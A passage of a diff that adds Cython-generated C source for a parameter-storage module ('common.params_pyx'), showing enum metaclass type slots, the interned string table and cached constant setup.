__Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __Pyx_EnumMeta_slots[] = { + {Py_sq_item, (void *)__pyx_sq_item___Pyx_EnumMeta}, + {Py_mp_subscript, (void *)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__}, + {Py_tp_traverse, (void *)__pyx_tp_traverse___Pyx_EnumMeta}, + {Py_tp_clear, (void *)__pyx_tp_clear___Pyx_EnumMeta}, + {Py_tp_iter, (void *)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__}, + {Py_tp_methods, (void *)__pyx_methods___Pyx_EnumMeta}, + {Py_tp_init, (void *)__pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__}, + {0, 0}, +}; +static PyType_Spec __Pyx_EnumMeta_spec = { + "common.params_pyx.__Pyx_EnumMeta", + sizeof(struct __pyx_obj___Pyx_EnumMeta), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, + __Pyx_EnumMeta_slots, +}; +#else + +static PySequenceMethods __pyx_tp_as_sequence___Pyx_EnumMeta = { + 0, /*sq_length*/ + 0, /*sq_concat*/ + 0, /*sq_repeat*/ + __pyx_sq_item___Pyx_EnumMeta, /*sq_item*/ + 0, /*sq_slice*/ + 0, /*sq_ass_item*/ + 0, /*sq_ass_slice*/ + 0, /*sq_contains*/ + 0, /*sq_inplace_concat*/ + 0, /*sq_inplace_repeat*/ +}; + +static PyMappingMethods __pyx_tp_as_mapping___Pyx_EnumMeta = { + 0, /*mp_length*/ + __pyx_pw_8EnumBase_14__Pyx_EnumMeta_5__getitem__, /*mp_subscript*/ + 0, /*mp_ass_subscript*/ +}; + +static PyTypeObject __Pyx_EnumMeta = { + PyVarObject_HEAD_INIT(0, 0) + "common.params_pyx.""__Pyx_EnumMeta", /*tp_name*/ + sizeof(struct __pyx_obj___Pyx_EnumMeta), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + 0, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + &__pyx_tp_as_sequence___Pyx_EnumMeta, /*tp_as_sequence*/ + &__pyx_tp_as_mapping___Pyx_EnumMeta, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE|Py_TPFLAGS_HAVE_GC|Py_TPFLAGS_HAVE_FINALIZE, /*tp_flags*/ + 0, /*tp_doc*/ + __pyx_tp_traverse___Pyx_EnumMeta, /*tp_traverse*/ + __pyx_tp_clear___Pyx_EnumMeta, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + __pyx_pw_8EnumBase_14__Pyx_EnumMeta_3__iter__, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods___Pyx_EnumMeta, /*tp_methods*/ + 0, /*tp_members*/ + 0, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + __pyx_pw_8EnumBase_14__Pyx_EnumMeta_1__init__, /*tp_init*/ + 0, /*tp_alloc*/ + 0, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyMethodDef __pyx_methods[] = { + {0, 0, 0, 0} +}; +#ifndef CYTHON_SMALL_CODE +#if defined(__clang__) + #define CYTHON_SMALL_CODE +#elif defined(__GNUC__) && (__GNUC__ > 4 || (__GNUC__ == 4 && __GNUC_MINOR__ >= 3)) + #define CYTHON_SMALL_CODE __attribute__((cold)) +#else + #define CYTHON_SMALL_CODE +#endif +#endif +/* #### Code section: pystring_table ### */ + +static int __Pyx_CreateStringTabAndInitStrings(void) { + __Pyx_StringTabEntry __pyx_string_tab[] = { + {&__pyx_kp_s_, __pyx_k_, sizeof(__pyx_k_), 0, 0, 1, 0}, + {&__pyx_kp_u_, __pyx_k_, sizeof(__pyx_k_), 0, 1, 0, 0}, + {&__pyx_n_s_ALL, __pyx_k_ALL, sizeof(__pyx_k_ALL), 0, 0, 1, 1}, + {&__pyx_n_s_CLEAR_ON_MANAGER_START, __pyx_k_CLEAR_ON_MANAGER_START, sizeof(__pyx_k_CLEAR_ON_MANAGER_START), 0, 0, 1, 1}, + {&__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION, __pyx_k_CLEAR_ON_OFFROAD_TRANSITION, sizeof(__pyx_k_CLEAR_ON_OFFROAD_TRANSITION), 0, 0, 1, 1}, + {&__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION, __pyx_k_CLEAR_ON_ONROAD_TRANSITION, sizeof(__pyx_k_CLEAR_ON_ONROAD_TRANSITION), 0, 0, 1, 1}, + {&__pyx_n_s_EnumBase, __pyx_k_EnumBase, sizeof(__pyx_k_EnumBase), 0, 0, 1, 1}, + {&__pyx_n_s_EnumType, __pyx_k_EnumType, sizeof(__pyx_k_EnumType), 0, 0, 1, 1}, + {&__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_k_Incompatible_checksums_0x_x_vs_0, sizeof(__pyx_k_Incompatible_checksums_0x_x_vs_0), 0, 0, 1, 0}, + {&__pyx_n_s_IntEnum, __pyx_k_IntEnum, sizeof(__pyx_k_IntEnum), 0, 0, 1, 1}, + {&__pyx_n_s_IntFlag, __pyx_k_IntFlag, sizeof(__pyx_k_IntFlag), 0, 0, 1, 1}, + {&__pyx_n_s_KeyboardInterrupt, __pyx_k_KeyboardInterrupt, sizeof(__pyx_k_KeyboardInterrupt), 0, 0, 1, 1}, + {&__pyx_n_s_MemoryError, __pyx_k_MemoryError, sizeof(__pyx_k_MemoryError), 0, 0, 1, 1}, + {&__pyx_n_s_OrderedDict, __pyx_k_OrderedDict, sizeof(__pyx_k_OrderedDict), 0, 0, 1, 1}, + {&__pyx_n_s_PERSISTENT, __pyx_k_PERSISTENT, sizeof(__pyx_k_PERSISTENT), 0, 0, 1, 1}, + {&__pyx_n_s_ParamKeyType, __pyx_k_ParamKeyType, sizeof(__pyx_k_ParamKeyType), 0, 0, 1, 1}, + {&__pyx_n_s_Params, __pyx_k_Params, sizeof(__pyx_k_Params), 0, 0, 1, 1}, + {&__pyx_n_s_Params___reduce_cython, __pyx_k_Params___reduce_cython, sizeof(__pyx_k_Params___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Params___setstate_cython, __pyx_k_Params___setstate_cython, sizeof(__pyx_k_Params___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Params_all_keys, __pyx_k_Params_all_keys, sizeof(__pyx_k_Params_all_keys), 0, 0, 1, 1}, + {&__pyx_n_s_Params_check_key, __pyx_k_Params_check_key, sizeof(__pyx_k_Params_check_key), 0, 0, 1, 1}, + {&__pyx_n_s_Params_clear_all, __pyx_k_Params_clear_all, sizeof(__pyx_k_Params_clear_all), 0, 0, 1, 1}, + {&__pyx_n_s_Params_get, __pyx_k_Params_get, sizeof(__pyx_k_Params_get), 0, 0, 1, 1}, + {&__pyx_n_s_Params_get_bool, __pyx_k_Params_get_bool, sizeof(__pyx_k_Params_get_bool), 0, 0, 1, 1}, + {&__pyx_n_s_Params_get_param_path, __pyx_k_Params_get_param_path, sizeof(__pyx_k_Params_get_param_path), 0, 0, 1, 1}, + {&__pyx_n_s_Params_put, __pyx_k_Params_put, sizeof(__pyx_k_Params_put), 0, 0, 1, 1}, + {&__pyx_n_s_Params_put_bool, __pyx_k_Params_put_bool, sizeof(__pyx_k_Params_put_bool), 0, 0, 1, 1}, + {&__pyx_n_s_Params_remove, __pyx_k_Params_remove, sizeof(__pyx_k_Params_remove), 0, 0, 1, 1}, + {&__pyx_n_s_PickleError, __pyx_k_PickleError, sizeof(__pyx_k_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase, __pyx_k_Pyx_EnumBase, sizeof(__pyx_k_Pyx_EnumBase), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase___new, __pyx_k_Pyx_EnumBase___new, sizeof(__pyx_k_Pyx_EnumBase___new), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase___repr, __pyx_k_Pyx_EnumBase___repr, sizeof(__pyx_k_Pyx_EnumBase___repr), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumBase___str, __pyx_k_Pyx_EnumBase___str, sizeof(__pyx_k_Pyx_EnumBase___str), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumMeta___reduce_cython, __pyx_k_Pyx_EnumMeta___reduce_cython, sizeof(__pyx_k_Pyx_EnumMeta___reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_EnumMeta___setstate_cython, __pyx_k_Pyx_EnumMeta___setstate_cython, sizeof(__pyx_k_Pyx_EnumMeta___setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase, __pyx_k_Pyx_FlagBase, sizeof(__pyx_k_Pyx_FlagBase), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase___new, __pyx_k_Pyx_FlagBase___new, sizeof(__pyx_k_Pyx_FlagBase___new), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase___repr, __pyx_k_Pyx_FlagBase___repr, sizeof(__pyx_k_Pyx_FlagBase___repr), 0, 0, 1, 1}, + {&__pyx_n_s_Pyx_FlagBase___str, __pyx_k_Pyx_FlagBase___str, sizeof(__pyx_k_Pyx_FlagBase___str), 0, 0, 1, 1}, + {&__pyx_n_s_Thread, __pyx_k_Thread, sizeof(__pyx_k_Thread), 0, 0, 1, 1}, + {&__pyx_n_s_TypeError, __pyx_k_TypeError, sizeof(__pyx_k_TypeError), 0, 0, 1, 1}, + {&__pyx_n_s_UnknownKeyName, __pyx_k_UnknownKeyName, sizeof(__pyx_k_UnknownKeyName), 0, 0, 1, 1}, + {&__pyx_kp_s_Unknown_enum_value_s, __pyx_k_Unknown_enum_value_s, sizeof(__pyx_k_Unknown_enum_value_s), 0, 0, 1, 0}, + {&__pyx_n_s_ValueError, __pyx_k_ValueError, sizeof(__pyx_k_ValueError), 0, 0, 1, 1}, + {&__pyx_n_s__21, __pyx_k__21, sizeof(__pyx_k__21), 0, 0, 1, 1}, + {&__pyx_kp_u__3, __pyx_k__3, sizeof(__pyx_k__3), 0, 1, 0, 0}, + {&__pyx_n_s__51, __pyx_k__51, sizeof(__pyx_k__51), 0, 0, 1, 1}, + {&__pyx_n_s_all_keys, __pyx_k_all_keys, sizeof(__pyx_k_all_keys), 0, 0, 1, 1}, + {&__pyx_n_s_asyncio_coroutines, __pyx_k_asyncio_coroutines, sizeof(__pyx_k_asyncio_coroutines), 0, 0, 1, 1}, + {&__pyx_n_s_block, __pyx_k_block, sizeof(__pyx_k_block), 0, 0, 1, 1}, + {&__pyx_n_s_check_key, __pyx_k_check_key, sizeof(__pyx_k_check_key), 0, 0, 1, 1}, + {&__pyx_n_s_class, __pyx_k_class, sizeof(__pyx_k_class), 0, 0, 1, 1}, + {&__pyx_n_s_class_getitem, __pyx_k_class_getitem, sizeof(__pyx_k_class_getitem), 0, 0, 1, 1}, + {&__pyx_n_s_clear_all, __pyx_k_clear_all, sizeof(__pyx_k_clear_all), 0, 0, 1, 1}, + {&__pyx_n_s_cline_in_traceback, __pyx_k_cline_in_traceback, sizeof(__pyx_k_cline_in_traceback), 0, 0, 1, 1}, + {&__pyx_n_s_cls, __pyx_k_cls, sizeof(__pyx_k_cls), 0, 0, 1, 1}, + {&__pyx_n_s_collections, __pyx_k_collections, sizeof(__pyx_k_collections), 0, 0, 1, 1}, + {&__pyx_n_s_common_params_pyx, __pyx_k_common_params_pyx, sizeof(__pyx_k_common_params_pyx), 0, 0, 1, 1}, + {&__pyx_kp_s_common_params_pyx_pyx, __pyx_k_common_params_pyx_pyx, sizeof(__pyx_k_common_params_pyx_pyx), 0, 0, 1, 0}, + {&__pyx_n_s_d, __pyx_k_d, sizeof(__pyx_k_d), 0, 0, 1, 1}, + {&__pyx_n_s_dat, __pyx_k_dat, sizeof(__pyx_k_dat), 0, 0, 1, 1}, + {&__pyx_n_s_dat_bytes, __pyx_k_dat_bytes, sizeof(__pyx_k_dat_bytes), 0, 0, 1, 1}, + {&__pyx_n_s_dct, __pyx_k_dct, sizeof(__pyx_k_dct), 0, 0, 1, 1}, + {&__pyx_n_s_decode, __pyx_k_decode, sizeof(__pyx_k_decode), 0, 0, 1, 1}, + {&__pyx_n_s_dict, __pyx_k_dict, sizeof(__pyx_k_dict), 0, 0, 1, 1}, + {&__pyx_n_s_dict_2, __pyx_k_dict_2, sizeof(__pyx_k_dict_2), 0, 0, 1, 1}, + {&__pyx_kp_u_disable, __pyx_k_disable, sizeof(__pyx_k_disable), 0, 1, 0, 0}, + {&__pyx_n_s_doc, __pyx_k_doc, sizeof(__pyx_k_doc), 0, 0, 1, 1}, + {&__pyx_kp_u_enable, __pyx_k_enable, sizeof(__pyx_k_enable), 0, 1, 0, 0}, + {&__pyx_n_s_encode, __pyx_k_encode, sizeof(__pyx_k_encode), 0, 0, 1, 1}, + {&__pyx_n_s_encoding, __pyx_k_encoding, sizeof(__pyx_k_encoding), 0, 0, 1, 1}, + {&__pyx_n_s_ensure_bytes, __pyx_k_ensure_bytes, sizeof(__pyx_k_ensure_bytes), 0, 0, 1, 1}, + {&__pyx_n_s_enum, __pyx_k_enum, sizeof(__pyx_k_enum), 0, 0, 1, 1}, + {&__pyx_kp_u_gc, __pyx_k_gc, sizeof(__pyx_k_gc), 0, 1, 0, 0}, + {&__pyx_n_s_get, __pyx_k_get, sizeof(__pyx_k_get), 0, 0, 1, 1}, + {&__pyx_n_s_get_bool, __pyx_k_get_bool, sizeof(__pyx_k_get_bool), 0, 0, 1, 1}, + {&__pyx_n_s_get_param_path, __pyx_k_get_param_path, sizeof(__pyx_k_get_param_path), 0, 0, 1, 1}, + {&__pyx_n_s_getstate, __pyx_k_getstate, sizeof(__pyx_k_getstate), 0, 0, 1, 1}, + {&__pyx_n_s_import, __pyx_k_import, sizeof(__pyx_k_import), 0, 0, 1, 1}, + {&__pyx_n_s_init, __pyx_k_init, sizeof(__pyx_k_init), 0, 0, 1, 1}, + {&__pyx_n_s_init_subclass, __pyx_k_init_subclass, sizeof(__pyx_k_init_subclass), 0, 0, 1, 1}, + {&__pyx_n_s_initializing, __pyx_k_initializing, sizeof(__pyx_k_initializing), 0, 0, 1, 1}, + {&__pyx_n_s_is_coroutine, __pyx_k_is_coroutine, sizeof(__pyx_k_is_coroutine), 0, 0, 1, 1}, + {&__pyx_kp_u_isenabled, __pyx_k_isenabled, sizeof(__pyx_k_isenabled), 0, 1, 0, 0}, + {&__pyx_n_s_k, __pyx_k_k, sizeof(__pyx_k_k), 0, 0, 1, 1}, + {&__pyx_n_s_key, __pyx_k_key, sizeof(__pyx_k_key), 0, 0, 1, 1}, + {&__pyx_n_s_key_bytes, __pyx_k_key_bytes, sizeof(__pyx_k_key_bytes), 0, 0, 1, 1}, + {&__pyx_n_s_main, __pyx_k_main, sizeof(__pyx_k_main), 0, 0, 1, 1}, + {&__pyx_n_s_member_names, __pyx_k_member_names, sizeof(__pyx_k_member_names), 0, 0, 1, 1}, + {&__pyx_n_s_members, __pyx_k_members, sizeof(__pyx_k_members), 0, 0, 1, 1}, + {&__pyx_n_s_metaclass, __pyx_k_metaclass, sizeof(__pyx_k_metaclass), 0, 0, 1, 1}, + {&__pyx_n_s_module, __pyx_k_module, sizeof(__pyx_k_module), 0, 0, 1, 1}, + {&__pyx_n_s_module_2, __pyx_k_module_2, sizeof(__pyx_k_module_2), 0, 0, 1, 1}, + {&__pyx_n_s_mro_entries, __pyx_k_mro_entries, sizeof(__pyx_k_mro_entries), 0, 0, 1, 1}, + {&__pyx_n_s_name, __pyx_k_name, sizeof(__pyx_k_name), 0, 0, 1, 1}, + {&__pyx_n_s_name_2, __pyx_k_name_2, sizeof(__pyx_k_name_2), 0, 0, 1, 1}, + {&__pyx_n_s_new, __pyx_k_new, sizeof(__pyx_k_new), 0, 0, 1, 1}, + {&__pyx_kp_s_no_default___reduce___due_to_non, __pyx_k_no_default___reduce___due_to_non, sizeof(__pyx_k_no_default___reduce___due_to_non), 0, 0, 1, 0}, + {&__pyx_n_s_parents, __pyx_k_parents, sizeof(__pyx_k_parents), 0, 0, 1, 1}, + {&__pyx_n_s_pickle, __pyx_k_pickle, sizeof(__pyx_k_pickle), 0, 0, 1, 1}, + {&__pyx_n_s_prepare, __pyx_k_prepare, sizeof(__pyx_k_prepare), 0, 0, 1, 1}, + {&__pyx_n_s_put, __pyx_k_put, sizeof(__pyx_k_put), 0, 0, 1, 1}, + {&__pyx_n_s_put_bool, __pyx_k_put_bool, sizeof(__pyx_k_put_bool), 0, 0, 1, 1}, + {&__pyx_n_s_put_bool_nonblocking, __pyx_k_put_bool_nonblocking, sizeof(__pyx_k_put_bool_nonblocking), 0, 0, 1, 1}, + {&__pyx_n_s_put_bool_nonblocking_locals_lamb, __pyx_k_put_bool_nonblocking_locals_lamb, sizeof(__pyx_k_put_bool_nonblocking_locals_lamb), 0, 0, 1, 1}, + {&__pyx_n_s_put_nonblocking, __pyx_k_put_nonblocking, sizeof(__pyx_k_put_nonblocking), 0, 0, 1, 1}, + {&__pyx_n_s_put_nonblocking_locals_lambda, __pyx_k_put_nonblocking_locals_lambda, sizeof(__pyx_k_put_nonblocking_locals_lambda), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_PickleError, __pyx_k_pyx_PickleError, sizeof(__pyx_k_pyx_PickleError), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_checksum, __pyx_k_pyx_checksum, sizeof(__pyx_k_pyx_checksum), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_result, __pyx_k_pyx_result, sizeof(__pyx_k_pyx_result), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_state, __pyx_k_pyx_state, sizeof(__pyx_k_pyx_state), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_type, __pyx_k_pyx_type, sizeof(__pyx_k_pyx_type), 0, 0, 1, 1}, + {&__pyx_n_s_pyx_unpickle___Pyx_EnumMeta, __pyx_k_pyx_unpickle___Pyx_EnumMeta, sizeof(__pyx_k_pyx_unpickle___Pyx_EnumMeta), 0, 0, 1, 1}, + {&__pyx_n_s_qualname, __pyx_k_qualname, sizeof(__pyx_k_qualname), 0, 0, 1, 1}, + {&__pyx_n_s_r, __pyx_k_r, sizeof(__pyx_k_r), 0, 0, 1, 1}, + {&__pyx_n_s_range, __pyx_k_range, sizeof(__pyx_k_range), 0, 0, 1, 1}, + {&__pyx_n_s_reduce, __pyx_k_reduce, sizeof(__pyx_k_reduce), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_cython, __pyx_k_reduce_cython, sizeof(__pyx_k_reduce_cython), 0, 0, 1, 1}, + {&__pyx_n_s_reduce_ex, __pyx_k_reduce_ex, sizeof(__pyx_k_reduce_ex), 0, 0, 1, 1}, + {&__pyx_n_s_remove, __pyx_k_remove, sizeof(__pyx_k_remove), 0, 0, 1, 1}, + {&__pyx_n_s_repr, __pyx_k_repr, sizeof(__pyx_k_repr), 0, 0, 1, 1}, + {&__pyx_n_s_res, __pyx_k_res, sizeof(__pyx_k_res), 0, 0, 1, 1}, + {&__pyx_kp_s_s_s, __pyx_k_s_s, sizeof(__pyx_k_s_s), 0, 0, 1, 0}, + {&__pyx_kp_s_s_s_d, __pyx_k_s_s_d, sizeof(__pyx_k_s_s_d), 0, 0, 1, 0}, + {&__pyx_n_s_self, __pyx_k_self, sizeof(__pyx_k_self), 0, 0, 1, 1}, + {&__pyx_n_s_set_name, __pyx_k_set_name, sizeof(__pyx_k_set_name), 0, 0, 1, 1}, + {&__pyx_n_s_setstate, __pyx_k_setstate, sizeof(__pyx_k_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_setstate_cython, __pyx_k_setstate_cython, sizeof(__pyx_k_setstate_cython), 0, 0, 1, 1}, + {&__pyx_n_s_spec, __pyx_k_spec, sizeof(__pyx_k_spec), 0, 0, 1, 1}, + {&__pyx_n_s_start, __pyx_k_start, sizeof(__pyx_k_start), 0, 0, 1, 1}, + {&__pyx_n_s_state, __pyx_k_state, sizeof(__pyx_k_state), 0, 0, 1, 1}, + {&__pyx_n_s_str, __pyx_k_str, sizeof(__pyx_k_str), 0, 0, 1, 1}, + {&__pyx_kp_s_stringsource, __pyx_k_stringsource, sizeof(__pyx_k_stringsource), 0, 0, 1, 0}, + {&__pyx_n_s_super, __pyx_k_super, sizeof(__pyx_k_super), 0, 0, 1, 1}, + {&__pyx_n_s_target, __pyx_k_target, sizeof(__pyx_k_target), 0, 0, 1, 1}, + {&__pyx_n_s_test, __pyx_k_test, sizeof(__pyx_k_test), 0, 0, 1, 1}, + {&__pyx_n_s_threading, __pyx_k_threading, sizeof(__pyx_k_threading), 0, 0, 1, 1}, + {&__pyx_n_s_tx_type, __pyx_k_tx_type, sizeof(__pyx_k_tx_type), 0, 0, 1, 1}, + {&__pyx_n_s_update, __pyx_k_update, sizeof(__pyx_k_update), 0, 0, 1, 1}, + {&__pyx_n_s_use_setstate, __pyx_k_use_setstate, sizeof(__pyx_k_use_setstate), 0, 0, 1, 1}, + {&__pyx_n_s_v, __pyx_k_v, sizeof(__pyx_k_v), 0, 0, 1, 1}, + {&__pyx_n_s_val, __pyx_k_val, sizeof(__pyx_k_val), 0, 0, 1, 1}, + {&__pyx_n_s_value, __pyx_k_value, sizeof(__pyx_k_value), 0, 0, 1, 1}, + {&__pyx_n_s_values, __pyx_k_values, sizeof(__pyx_k_values), 0, 0, 1, 1}, + {0, 0, 0, 0, 0, 0, 0} + }; + return __Pyx_InitStrings(__pyx_string_tab); +} +/* #### Code section: cached_builtins ### */ +static CYTHON_SMALL_CODE int __Pyx_InitCachedBuiltins(void) { + __pyx_builtin_KeyboardInterrupt = __Pyx_GetBuiltinName(__pyx_n_s_KeyboardInterrupt); if (!__pyx_builtin_KeyboardInterrupt) __PYX_ERR(0, 65, __pyx_L1_error) + __pyx_builtin_TypeError = __Pyx_GetBuiltinName(__pyx_n_s_TypeError); if (!__pyx_builtin_TypeError) __PYX_ERR(1, 2, __pyx_L1_error) + __pyx_builtin_MemoryError = __Pyx_GetBuiltinName(__pyx_n_s_MemoryError); if (!__pyx_builtin_MemoryError) __PYX_ERR(1, 68, __pyx_L1_error) + __pyx_builtin_range = __Pyx_GetBuiltinName(__pyx_n_s_range); if (!__pyx_builtin_range) __PYX_ERR(1, 76, __pyx_L1_error) + __pyx_builtin_ValueError = __Pyx_GetBuiltinName(__pyx_n_s_ValueError); if (!__pyx_builtin_ValueError) __PYX_ERR(1, 33, __pyx_L1_error) + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: cached_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitCachedConstants(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_InitCachedConstants", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + */ + __pyx_tuple__2 = PyTuple_Pack(3, __pyx_int_238750788, __pyx_int_228825662, __pyx_int_222419149); if (unlikely(!__pyx_tuple__2)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__2); + __Pyx_GIVEREF(__pyx_tuple__2); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * cdef tuple state + * cdef object _dict + */ + __pyx_tuple__5 = PyTuple_Pack(4, __pyx_n_s_self, __pyx_n_s_state, __pyx_n_s_dict_2, __pyx_n_s_use_setstate); if (unlikely(!__pyx_tuple__5)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__5); + __Pyx_GIVEREF(__pyx_tuple__5); + __pyx_codeobj__6 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 4, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__5, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_reduce_cython, 1, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__6)) __PYX_ERR(1, 1, __pyx_L1_error) + + /* "(tree fragment)":16 + * else: + * return __pyx_unpickle___Pyx_EnumMeta, (type(self), 0xe3b0c44, state) + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(self, __pyx_state) + */ + __pyx_tuple__7 = PyTuple_Pack(2, __pyx_n_s_self, __pyx_n_s_pyx_state); if (unlikely(!__pyx_tuple__7)) __PYX_ERR(1, 16, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__7); + __Pyx_GIVEREF(__pyx_tuple__7); + __pyx_codeobj__8 = (PyObject*)__Pyx_PyCode_New(2, 0, 0, 2, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__7, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_setstate_cython, 16, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__8)) __PYX_ERR(1, 16, __pyx_L1_error) + + /* "EnumBase":28 + * cdef object __Pyx_EnumBase + * class __Pyx_EnumBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_tuple__9 = PyTuple_Pack(5, __pyx_n_s_cls, __pyx_n_s_value, __pyx_n_s_name, __pyx_n_s_v, __pyx_n_s_res); if (unlikely(!__pyx_tuple__9)) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__9); + __Pyx_GIVEREF(__pyx_tuple__9); + __pyx_codeobj__10 = (PyObject*)__Pyx_PyCode_New(3, 0, 0, 5, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__9, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_new, 28, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__10)) __PYX_ERR(1, 28, __pyx_L1_error) + __pyx_tuple__11 = PyTuple_Pack(1, ((PyObject *)Py_None)); if (unlikely(!__pyx_tuple__11)) __PYX_ERR(1, 28, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__11); + __Pyx_GIVEREF(__pyx_tuple__11); + + /* "EnumBase":39 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_tuple__12 = PyTuple_Pack(1, __pyx_n_s_self); if (unlikely(!__pyx_tuple__12)) __PYX_ERR(1, 39, __pyx_L1_error) + __Pyx_GOTREF(__pyx_tuple__12); + __Pyx_GIVEREF(__pyx_tuple__12); + __pyx_codeobj__13 = (PyObject*)__Pyx_PyCode_New(1, 0, 0, 1, 0, CO_OPTIMIZED|CO_NEWLOCALS, __pyx_empty_bytes, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_tuple__12, __pyx_empty_tuple, __pyx_empty_tuple, __pyx_kp_s_stringsource, __pyx_n_s_repr, 39, __pyx_empty_bytes); if (unlikely(!__pyx_codeobj__13)) __PYX_ERR(1, 39, __pyx_L1_error) + + /* "EnumBase":41 + * def 